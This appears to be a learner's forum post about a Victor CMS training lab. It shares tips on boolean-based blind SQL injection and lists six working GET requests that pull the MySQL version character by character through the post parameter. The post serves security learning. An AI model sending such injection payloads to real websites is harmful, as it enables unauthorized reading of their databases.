During the walkthrough by Alexis in the video it looked like things were not going as expected. I spend some time to try this out myself in the Victor CMS lab and want to share my experiences. It might be helpful for others. My observations are as follows:
- The MySQL version detected by SQLmap (5.0.12 in my case) is not correct. Using exploit Victor CMS 1.0 - 'Search' SQL Injection - PHP webapps Exploit I was able to detect it as 5.5.56-log. This can cause confusion if you expect the substring(version(), x, y) to come with the same results as detected by SQLmap.
- The correct use of substring(string, x,y) is to provide the position in the string with x and use y for the length of the string that you want to compare. In our case we do a match on one character, so y should always be 1.
- In my case it did not work when the ‘=’-sign was URLencoded. Not sure why, but I noticed that the ‘=’-sign was not URL encoded when sending the request via the application. So in Burp after URLencoding the string I changed back the ‘%3d’ to ‘=’ and it worked reliably after that.
Calls with positive boolean result that determined the MySQL version (5.5.56 in my case):
Character 1: GET /post.php?post=1+AND+substring(version(),1,1)=‘5’%23 HTTP/2
Character 2: GET /post.php?post=1+AND+substring(version(),2,1)=‘.’%23 HTTP/2
Character 3: GET /post.php?post=1+AND+substring(version(),3,1)=‘5’%23 HTTP/2
Character 4: GET /post.php?post=1+AND+substring(version(),4,1)=‘.’%23 HTTP/2
Character 5: GET /post.php?post=1+AND+substring(version(),5,1)=‘5’%23 HTTP/2
Character 6: GET /post.php?post=1+AND+substring(version(),6,1)=‘6’%23 HTTP/2
In all these cases I got post 1 correctly loaded. With other values it did not load the post properly.
Hope this helps.